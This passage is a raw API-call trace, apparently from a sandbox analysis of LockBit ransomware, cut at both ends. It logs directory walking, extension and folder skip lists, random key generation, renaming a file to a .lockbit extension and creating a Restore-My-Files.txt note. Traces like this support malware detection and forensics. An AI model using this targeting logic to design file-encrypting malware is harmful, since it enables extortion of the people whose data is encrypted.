(lpString1=".mpa", lpString2=".xsl") returned -1 [0100.137] lstrcmpiW (lpString1=".cpl", lpString2=".xsl") returned -1 [0100.137] lstrcmpiW (lpString1=".mod", lpString2=".xsl") returned -1 [0100.137] lstrcmpiW (lpString1=".hta", lpString2=".xsl") returned -1 [0100.137] lstrcmpiW (lpString1=".icns", lpString2=".xsl") returned -1 [0100.137] lstrcmpiW (lpString1=".prf", lpString2=".xsl") returned -1 [0100.137] lstrcmpiW (lpString1=".rtp", lpString2=".xsl") returned -1 [0100.137] lstrcmpiW (lpString1=".diagcfg", lpString2=".xsl") returned -1 [0100.137] lstrcmpiW (lpString1=".msstyles", lpString2=".xsl") returned -1 [0100.137] lstrcmpiW (lpString1=".bin", lpString2=".xsl") returned -1 [0100.137] lstrcmpiW (lpString1=".hlp", lpString2=".xsl") returned -1 [0100.137] lstrcmpiW (lpString1=".shs", lpString2=".xsl") returned -1 [0100.137] lstrcmpiW (lpString1=".drv", lpString2=".xsl") returned -1 [0100.137] lstrcmpiW (lpString1=".wpx", lpString2=".xsl") returned -1 [0100.137] lstrcmpiW (lpString1=".bat", lpString2=".xsl") returned -1 [0100.137] lstrcmpiW (lpString1=".rom", lpString2=".xsl") returned -1 [0100.137] lstrcmpiW (lpString1=".msc", lpString2=".xsl") returned -1 [0100.137] lstrcmpiW (lpString1=".spl", lpString2=".xsl") returned -1 [0100.138] lstrcmpiW (lpString1=".ps1", lpString2=".xsl") returned -1 [0100.138] lstrcmpiW (lpString1=".msu", lpString2=".xsl") returned -1 [0100.138] lstrcmpiW (lpString1=".ics", lpString2=".xsl") returned -1 [0100.138] lstrcmpiW (lpString1=".key", lpString2=".xsl") returned -1 [0100.138] lstrcmpiW (lpString1=".mp3", lpString2=".xsl") returned -1 [0100.138] lstrcmpiW (lpString1=".reg", lpString2=".xsl") returned -1 [0100.138] lstrcmpiW (lpString1=".dll", lpString2=".xsl") returned -1 [0100.138] lstrcmpiW (lpString1=".ini", lpString2=".xsl") returned -1 [0100.138] lstrcmpiW (lpString1=".idx", lpString2=".xsl") returned -1 [0100.138] lstrcmpiW (lpString1=".sys", lpString2=".xsl") returned -1 [0100.138] lstrcmpiW (lpString1=".hlp", lpString2=".xsl") returned -1 [0100.138] lstrcmpiW (lpString1=".ico", lpString2=".xsl") returned -1 [0100.138] lstrcmpiW (lpString1=".lnk", lpString2=".xsl") returned -1 [0100.138] lstrcmpiW (lpString1=".rdp", lpString2=".xsl") returned -1 [0100.138] lstrcmpiW (lpString1=".lockbit", lpString2=".xsl") returned -1 [0100.138] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Sybase.xsl") returned -1 [0100.138] lstrcmpiW (lpString1="ntldr", lpString2="Sybase.xsl") returned -1 [0100.138] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Sybase.xsl") returned -1 [0100.138] lstrcmpiW (lpString1="bootsect.bak", lpString2="Sybase.xsl") returned -1 [0100.138] lstrcmpiW (lpString1="autorun.inf", lpString2="Sybase.xsl") returned -1 [0100.138] lstrcmpiW (lpString1="thumbs.db", lpString2="Sybase.xsl") returned 1 [0100.138] lstrcmpiW (lpString1="iconcache.db", lpString2="Sybase.xsl") returned -1 [0100.138] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges" | out: pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\") returned="" [0100.138] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned=".xsl" [0100.139] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0100.139] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0100.139] lstrcmpiW (lpString1=".7z", lpString2=".xsl") returned -1 [0100.139] lstrcmpiW (lpString1=".ckp", lpString2=".xsl") returned -1 [0100.139] lstrcmpiW (lpString1=".dacpac", lpString2=".xsl") returned -1 [0100.139] lstrcmpiW (lpString1=".db", lpString2=".xsl") returned -1 [0100.139] lstrcmpiW (lpString1=".db-shm", lpString2=".xsl") returned -1 [0100.139] lstrcmpiW (lpString1=".db-wal", lpString2=".xsl") returned -1 [0100.139] lstrcmpiW (lpString1=".db3", lpString2=".xsl") returned -1 [0100.139] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0100.139] lstrcmpiW (lpString1=".dbc", lpString2=".xsl") returned -1 [0100.139] lstrcmpiW (lpString1=".dbs", lpString2=".xsl") returned -1 [0100.139] lstrcmpiW (lpString1=".dbt", lpString2=".xsl") returned -1 [0100.139] lstrcmpiW (lpString1=".dbv", lpString2=".xsl") returned -1 [0100.139] lstrcmpiW (lpString1=".frm", lpString2=".xsl") returned -1 [0100.139] lstrcmpiW (lpString1=".mdf", lpString2=".xsl") returned -1 [0100.139] lstrcmpiW (lpString1=".mrg", lpString2=".xsl") returned -1 [0100.139] lstrcmpiW (lpString1=".mwb", lpString2=".xsl") returned -1 [0100.139] lstrcmpiW (lpString1=".myd", lpString2=".xsl") returned -1 [0100.139] lstrcmpiW (lpString1=".ndf", lpString2=".xsl") returned -1 [0100.139] lstrcmpiW (lpString1=".qry", lpString2=".xsl") returned -1 [0100.139] lstrcmpiW (lpString1=".sdb", lpString2=".xsl") returned -1 [0100.139] lstrcmpiW (lpString1=".sdf", lpString2=".xsl") returned -1 [0100.139] lstrcmpiW (lpString1=".sql", lpString2=".xsl") returned -1 [0100.139] lstrcmpiW (lpString1=".sqlite", lpString2=".xsl") returned -1 [0100.139] lstrcmpiW (lpString1=".sqlite3", lpString2=".xsl") returned -1 [0100.139] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xsl") returned -1 [0100.140] lstrcmpiW (lpString1=".tmd", lpString2=".xsl") returned -1 [0100.140] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl.lockbit") returned 87 [0100.140] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b0 [0100.148] CreateIoCompletionPort (FileHandle=0x3b0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0100.148] malloc (_Size=0x40068) returned 0x1ff1e60 [0100.148] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=29790) returned 1 [0100.148] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.150] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0100.150] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.152] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.152] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0100.152] ReadFile (in: hFile=0x3b0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0100.222] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0100.222] malloc (_Size=0xc4) returned 0x77d800 [0100.222] NtSetInformationFile (FileHandle=0x3b0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xc4, FileInformationClass=0xa) returned 0x0 [0100.223] free (_Block=0x77d800) [0100.223] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl" | out: pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges") returned 1 [0100.223] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Restore-My-Files.txt") returned 89 [0100.223] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0100.223] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa81fdc00, ftCreationTime.dwHighDateTime=0x1c8dd0e, ftLastAccessTime.dwLowDateTime=0x5edefe10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa81fdc00, ftLastWriteTime.dwHighDateTime=0x1c8dd0e, nFileSizeHigh=0x0, nFileSizeLow=0x745e, dwReserved0=0x0, dwReserved1=0x3d6ffc4, cFileName="Sybase.xsl", cAlternateFileName="")) returned 0 [0100.223] FindClose (in: hFindFile=0x55fe78 | out: hFindFile=0x55fe78) returned 1 [0100.223] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3cf6c00, ftCreationTime.dwHighDateTime=0x1ca2caa, ftLastAccessTime.dwLowDateTime=0x5f005150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf3cf6c00, ftLastWriteTime.dwHighDateTime=0x1ca2caa, nFileSizeHigh=0x0, nFileSizeLow=0x2a65d68, dwReserved0=0x0, dwReserved1=0x0, cFileName="msmdlocal.dll", cAlternateFileName="MSMDLO~1.DLL")) returned 1 [0100.223] lstrcmpiW (lpString1=".", lpString2="msmdlocal.dll") returned -1 [0100.224] lstrcmpiW (lpString1="..", lpString2="msmdlocal.dll") returned -1 [0100.224] PathFindExtensionW (pszPath="msmdlocal.dll") returned=".dll" [0100.224] lstrcmpiW (lpString1=".386", lpString2=".dll") returned -1 [0100.224] lstrcmpiW (lpString1=".cmd", lpString2=".dll") returned -1 [0100.224] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0100.224] lstrcmpiW (lpString1=".ani", lpString2=".dll") returned -1 [0100.224] lstrcmpiW (lpString1=".adv", lpString2=".dll") returned -1 [0100.224] lstrcmpiW (lpString1=".theme", lpString2=".dll") returned 1 [0100.224] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0100.224] lstrcmpiW (lpString1=".msp", lpString2=".dll") returned 1 [0100.224] lstrcmpiW (lpString1=".com", lpString2=".dll") returned -1 [0100.224] lstrcmpiW (lpString1=".diagpkg", lpString2=".dll") returned -1 [0100.224] lstrcmpiW (lpString1=".nls", lpString2=".dll") returned 1 [0100.224] lstrcmpiW (lpString1=".diagcab", lpString2=".dll") returned -1 [0100.224] lstrcmpiW (lpString1=".lock", lpString2=".dll") returned 1 [0100.224] lstrcmpiW (lpString1=".ocx", lpString2=".dll") returned 1 [0100.224] lstrcmpiW (lpString1=".mpa", lpString2=".dll") returned 1 [0100.224] lstrcmpiW (lpString1=".cpl", lpString2=".dll") returned -1 [0100.224] lstrcmpiW (lpString1=".mod", lpString2=".dll") returned 1 [0100.224] lstrcmpiW (lpString1=".hta", lpString2=".dll") returned 1 [0100.224] lstrcmpiW (lpString1=".icns", lpString2=".dll") returned 1 [0100.224] lstrcmpiW (lpString1=".prf", lpString2=".dll") returned 1 [0100.224] lstrcmpiW (lpString1=".rtp", lpString2=".dll") returned 1 [0100.224] lstrcmpiW (lpString1=".diagcfg", lpString2=".dll") returned -1 [0100.225] lstrcmpiW (lpString1=".msstyles", lpString2=".dll") returned 1 [0100.225] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0100.225] lstrcmpiW (lpString1=".hlp", lpString2=".dll") returned 1 [0100.225] lstrcmpiW (lpString1=".shs", lpString2=".dll") returned 1 [0100.225] lstrcmpiW (lpString1=".drv", lpString2=".dll") returned 1 [0100.225] lstrcmpiW (lpString1=".wpx", lpString2=".dll") returned 1 [0100.225] lstrcmpiW (lpString1=".bat", lpString2=".dll") returned -1 [0100.225] lstrcmpiW (lpString1=".rom", lpString2=".dll") returned 1 [0100.225] lstrcmpiW (lpString1=".msc", lpString2=".dll") returned 1 [0100.225] lstrcmpiW (lpString1=".spl", lpString2=".dll") returned 1 [0100.225] lstrcmpiW (lpString1=".ps1", lpString2=".dll") returned 1 [0100.225] lstrcmpiW (lpString1=".msu", lpString2=".dll") returned 1 [0100.225] lstrcmpiW (lpString1=".ics", lpString2=".dll") returned 1 [0100.225] lstrcmpiW (lpString1=".key", lpString2=".dll") returned 1 [0100.225] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0100.225] lstrcmpiW (lpString1=".reg", lpString2=".dll") returned 1 [0100.225] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0100.225] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47fe200, ftCreationTime.dwHighDateTime=0x1ca2cab, ftLastAccessTime.dwLowDateTime=0x51552c10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x47fe200, ftLastWriteTime.dwHighDateTime=0x1ca2cab, nFileSizeHigh=0x0, nFileSizeLow=0xbc4568, dwReserved0=0x0, dwReserved1=0x0, cFileName="msmgdsrv.dll", cAlternateFileName="")) returned 1 [0100.225] lstrcmpiW (lpString1=".", lpString2="msmgdsrv.dll") returned -1 [0100.225] lstrcmpiW (lpString1="..", lpString2="msmgdsrv.dll") returned -1 [0100.225] PathFindExtensionW (pszPath="msmgdsrv.dll") returned=".dll" [0100.225] lstrcmpiW (lpString1=".386", lpString2=".dll") returned -1 [0100.226] lstrcmpiW (lpString1=".cmd", lpString2=".dll") returned -1 [0100.226] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0100.226] lstrcmpiW (lpString1=".ani", lpString2=".dll") returned -1 [0100.226] lstrcmpiW (lpString1=".adv", lpString2=".dll") returned -1 [0100.226] lstrcmpiW (lpString1=".theme", lpString2=".dll") returned 1 [0100.226] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0100.226] lstrcmpiW (lpString1=".msp", lpString2=".dll") returned 1 [0100.226] lstrcmpiW (lpString1=".com", lpString2=".dll") returned -1 [0100.226] lstrcmpiW (lpString1=".diagpkg", lpString2=".dll") returned -1 [0100.226] lstrcmpiW (lpString1=".nls", lpString2=".dll") returned 1 [0100.226] lstrcmpiW (lpString1=".diagcab", lpString2=".dll") returned -1 [0100.226] lstrcmpiW (lpString1=".lock", lpString2=".dll") returned 1 [0100.226] lstrcmpiW (lpString1=".ocx", lpString2=".dll") returned 1 [0100.226] lstrcmpiW (lpString1=".mpa", lpString2=".dll") returned 1 [0100.226] lstrcmpiW (lpString1=".cpl", lpString2=".dll") returned -1 [0100.226] lstrcmpiW (lpString1=".mod", lpString2=".dll") returned 1 [0100.226] lstrcmpiW (lpString1=".hta", lpString2=".dll") returned 1 [0100.226] lstrcmpiW (lpString1=".icns", lpString2=".dll") returned 1 [0100.226] lstrcmpiW (lpString1=".prf", lpString2=".dll") returned 1 [0100.226] lstrcmpiW (lpString1=".rtp", lpString2=".dll") returned 1 [0100.226] lstrcmpiW (lpString1=".diagcfg", lpString2=".dll") returned -1 [0100.226] lstrcmpiW (lpString1=".msstyles", lpString2=".dll") returned 1 [0100.226] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0100.227] lstrcmpiW (lpString1=".hlp", lpString2=".dll") returned 1 [0100.227] lstrcmpiW (lpString1=".shs", lpString2=".dll") returned 1 [0100.227] lstrcmpiW (lpString1=".drv", lpString2=".dll") returned 1 [0100.227] lstrcmpiW (lpString1=".wpx", lpString2=".dll") returned 1 [0100.227] lstrcmpiW (lpString1=".bat", lpString2=".dll") returned -1 [0100.227] lstrcmpiW (lpString1=".rom", lpString2=".dll") returned 1 [0100.227] lstrcmpiW (lpString1=".msc", lpString2=".dll") returned 1 [0100.227] lstrcmpiW (lpString1=".spl", lpString2=".dll") returned 1 [0100.227] lstrcmpiW (lpString1=".ps1", lpString2=".dll") returned 1 [0100.227] lstrcmpiW (lpString1=".msu", lpString2=".dll") returned 1 [0100.227] lstrcmpiW (lpString1=".ics", lpString2=".dll") returned 1 [0100.227] lstrcmpiW (lpString1=".key", lpString2=".dll") returned 1 [0100.227] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0100.227] lstrcmpiW (lpString1=".reg", lpString2=".dll") returned 1 [0100.227] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0100.227] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b10f00, ftCreationTime.dwHighDateTime=0x1ca2cab, ftLastAccessTime.dwLowDateTime=0x5f28c8b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5b10f00, ftLastWriteTime.dwHighDateTime=0x1ca2cab, nFileSizeHigh=0x0, nFileSizeLow=0x7c6f68, dwReserved0=0x0, dwReserved1=0x0, cFileName="msolap100.dll", cAlternateFileName="MSOLAP~1.DLL")) returned 1 [0100.227] lstrcmpiW (lpString1=".", lpString2="msolap100.dll") returned -1 [0100.227] lstrcmpiW (lpString1="..", lpString2="msolap100.dll") returned -1 [0100.227] PathFindExtensionW (pszPath="msolap100.dll") returned=".dll" [0100.227] lstrcmpiW (lpString1=".386", lpString2=".dll") returned -1 [0100.227] lstrcmpiW (lpString1=".cmd", lpString2=".dll") returned -1 [0100.227] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0100.228] lstrcmpiW (lpString1=".ani", lpString2=".dll") returned -1 [0100.228] lstrcmpiW (lpString1=".adv", lpString2=".dll") returned -1 [0100.228] lstrcmpiW (lpString1=".theme", lpString2=".dll") returned 1 [0100.228] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0100.228] lstrcmpiW (lpString1=".msp", lpString2=".dll") returned 1 [0100.228] lstrcmpiW (lpString1=".com", lpString2=".dll") returned -1 [0100.228] lstrcmpiW (lpString1=".diagpkg", lpString2=".dll") returned -1 [0100.228] lstrcmpiW (lpString1=".nls", lpString2=".dll") returned 1 [0100.228] lstrcmpiW (lpString1=".diagcab", lpString2=".dll") returned -1 [0100.228] lstrcmpiW (lpString1=".lock", lpString2=".dll") returned 1 [0100.228] lstrcmpiW (lpString1=".ocx", lpString2=".dll") returned 1 [0100.228] lstrcmpiW (lpString1=".mpa", lpString2=".dll") returned 1 [0100.228] lstrcmpiW (lpString1=".cpl", lpString2=".dll") returned -1 [0100.228] lstrcmpiW (lpString1=".mod", lpString2=".dll") returned 1 [0100.228] lstrcmpiW (lpString1=".hta", lpString2=".dll") returned 1 [0100.228] lstrcmpiW (lpString1=".icns", lpString2=".dll") returned 1 [0100.228] lstrcmpiW (lpString1=".prf", lpString2=".dll") returned 1 [0100.228] lstrcmpiW (lpString1=".rtp", lpString2=".dll") returned 1 [0100.228] lstrcmpiW (lpString1=".diagcfg", lpString2=".dll") returned -1 [0100.228] lstrcmpiW (lpString1=".msstyles", lpString2=".dll") returned 1 [0100.228] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0100.228] lstrcmpiW (lpString1=".hlp", lpString2=".dll") returned 1 [0100.228] lstrcmpiW (lpString1=".shs", lpString2=".dll") returned 1 [0100.229] lstrcmpiW (lpString1=".drv", lpString2=".dll") returned 1 [0100.229] lstrcmpiW (lpString1=".wpx", lpString2=".dll") returned 1 [0100.229] lstrcmpiW (lpString1=".bat", lpString2=".dll") returned -1 [0100.229] lstrcmpiW (lpString1=".rom", lpString2=".dll") returned 1 [0100.229] lstrcmpiW (lpString1=".msc", lpString2=".dll") returned 1 [0100.229] lstrcmpiW (lpString1=".spl", lpString2=".dll") returned 1 [0100.229] lstrcmpiW (lpString1=".ps1", lpString2=".dll") returned 1 [0100.229] lstrcmpiW (lpString1=".msu", lpString2=".dll") returned 1 [0100.229] lstrcmpiW (lpString1=".ics", lpString2=".dll") returned 1 [0100.229] lstrcmpiW (lpString1=".key", lpString2=".dll") returned 1 [0100.229] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0100.229] lstrcmpiW (lpString1=".reg", lpString2=".dll") returned 1 [0100.229] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0100.229] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb46ad400, ftCreationTime.dwHighDateTime=0x1c8e1fb, ftLastAccessTime.dwLowDateTime=0x516f5b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb46ad400, ftLastWriteTime.dwHighDateTime=0x1c8e1fb, nFileSizeHigh=0x0, nFileSizeLow=0x4dc18, dwReserved0=0x0, dwReserved1=0x0, cFileName="msolui100.dll", cAlternateFileName="MSOLUI~1.DLL")) returned 1 [0100.229] lstrcmpiW (lpString1=".", lpString2="msolui100.dll") returned -1 [0100.229] lstrcmpiW (lpString1="..", lpString2="msolui100.dll") returned -1 [0100.229] PathFindExtensionW (pszPath="msolui100.dll") returned=".dll" [0100.229] lstrcmpiW (lpString1=".386", lpString2=".dll") returned -1 [0100.229] lstrcmpiW (lpString1=".cmd", lpString2=".dll") returned -1 [0100.229] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0100.229] lstrcmpiW (lpString1=".ani", lpString2=".dll") returned -1 [0100.229] lstrcmpiW (lpString1=".adv", lpString2=".dll") returned -1 [0100.229] lstrcmpiW (lpString1=".theme", lpString2=".dll") returned 1 [0100.230] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0100.230] lstrcmpiW (lpString1=".msp", lpString2=".dll") returned 1 [0100.230] lstrcmpiW (lpString1=".com", lpString2=".dll") returned -1 [0100.230] lstrcmpiW (lpString1=".diagpkg", lpString2=".dll") returned -1 [0100.230] lstrcmpiW (lpString1=".nls", lpString2=".dll") returned 1 [0100.230] lstrcmpiW (lpString1=".diagcab", lpString2=".dll") returned -1 [0100.230] lstrcmpiW (lpString1=".lock", lpString2=".dll") returned 1 [0100.230] lstrcmpiW (lpString1=".ocx", lpString2=".dll") returned 1 [0100.230] lstrcmpiW (lpString1=".mpa", lpString2=".dll") returned 1 [0100.230] lstrcmpiW (lpString1=".cpl", lpString2=".dll") returned -1 [0100.230] lstrcmpiW (lpString1=".mod", lpString2=".dll") returned 1 [0100.230] lstrcmpiW (lpString1=".hta", lpString2=".dll") returned 1 [0100.230] lstrcmpiW (lpString1=".icns", lpString2=".dll") returned 1 [0100.230] lstrcmpiW (lpString1=".prf", lpString2=".dll") returned 1 [0100.230] lstrcmpiW (lpString1=".rtp", lpString2=".dll") returned 1 [0100.230] lstrcmpiW (lpString1=".diagcfg", lpString2=".dll") returned -1 [0100.230] lstrcmpiW (lpString1=".msstyles", lpString2=".dll") returned 1 [0100.230] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0100.230] lstrcmpiW (lpString1=".hlp", lpString2=".dll") returned 1 [0100.230] lstrcmpiW (lpString1=".shs", lpString2=".dll") returned 1 [0100.230] lstrcmpiW (lpString1=".drv", lpString2=".dll") returned 1 [0100.230] lstrcmpiW (lpString1=".wpx", lpString2=".dll") returned 1 [0100.231] lstrcmpiW (lpString1=".bat", lpString2=".dll") returned -1 [0100.231] lstrcmpiW (lpString1=".rom", lpString2=".dll") returned 1 [0100.231] lstrcmpiW (lpString1=".msc", lpString2=".dll") returned 1 [0100.231] lstrcmpiW (lpString1=".spl", lpString2=".dll") returned 1 [0100.231] lstrcmpiW (lpString1=".ps1", lpString2=".dll") returned 1 [0100.231] lstrcmpiW (lpString1=".msu", lpString2=".dll") returned 1 [0100.231] lstrcmpiW (lpString1=".ics", lpString2=".dll") returned 1 [0100.231] lstrcmpiW (lpString1=".key", lpString2=".dll") returned 1 [0100.231] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0100.231] lstrcmpiW (lpString1=".reg", lpString2=".dll") returned 1 [0100.231] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0100.231] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Resources", cAlternateFileName="RESOUR~1")) returned 1 [0100.231] lstrcmpiW (lpString1=".", lpString2="Resources") returned -1 [0100.231] lstrcmpiW (lpString1="..", lpString2="Resources") returned -1 [0100.231] lstrcmpiW (lpString1="Resources", lpString2="$windows.~bt") returned 1 [0100.231] lstrcmpiW (lpString1="Resources", lpString2="intel") returned 1 [0100.231] lstrcmpiW (lpString1="Resources", lpString2="msocache") returned 1 [0100.231] lstrcmpiW (lpString1="Resources", lpString2="$recycle.bin") returned 1 [0100.231] lstrcmpiW (lpString1="Resources", lpString2="$windows.~ws") returned 1 [0100.231] lstrcmpiW (lpString1="Resources", lpString2="tor browser") returned -1 [0100.231] lstrcmpiW (lpString1="Resources", lpString2="boot") returned 1 [0100.231] lstrcmpiW (lpString1="Resources", lpString2="system volume information") returned -1 [0100.232] lstrcmpiW (lpString1="Resources", lpString2="perflogs") returned 1 [0100.232] lstrcmpiW (lpString1="Resources", lpString2="google") returned 1 [0100.232] lstrcmpiW (lpString1="Resources", lpString2="application data") returned 1 [0100.232] lstrcmpiW (lpString1="Resources", lpString2="windows") returned -1 [0100.232] lstrcmpiW (lpString1="Resources", lpString2="windows.old") returned -1 [0100.232] lstrcmpiW (lpString1="Resources", lpString2="appdata") returned 1 [0100.232] lstrcmpiW (lpString1="Resources", lpString2="Windows nt") returned -1 [0100.232] lstrcmpiW (lpString1="Resources", lpString2="Msbuild") returned 1 [0100.232] lstrcmpiW (lpString1="Resources", lpString2="Microsoft") returned 1 [0100.232] lstrcmpiW (lpString1="Resources", lpString2="All users") returned 1 [0100.232] lstrcmpiW (lpString1="Resources", lpString2="mozilla") returned 1 [0100.232] lstrcmpiW (lpString1="Resources", lpString2="Microsoft.NET") returned 1 [0100.232] lstrcmpiW (lpString1="Resources", lpString2="microsoft shared") returned 1 [0100.232] lstrcmpiW (lpString1="Resources", lpString2="Internet Explorer") returned 1 [0100.232] lstrcmpiW (lpString1="Resources", lpString2="common files") returned 1 [0100.232] lstrcmpiW (lpString1="Resources", lpString2="opera") returned 1 [0100.232] lstrcmpiW (lpString1="Resources", lpString2="Windows Journal") returned -1 [0100.232] wsprintfW (in: param_1=0x3d6b928, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources") returned 67 [0100.232] wsprintfW (in: param_1=0x3d6ad00, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\*") returned 69 [0100.232] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6b120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6b120) returned 0x55fe78 [0100.233] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0100.233] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, 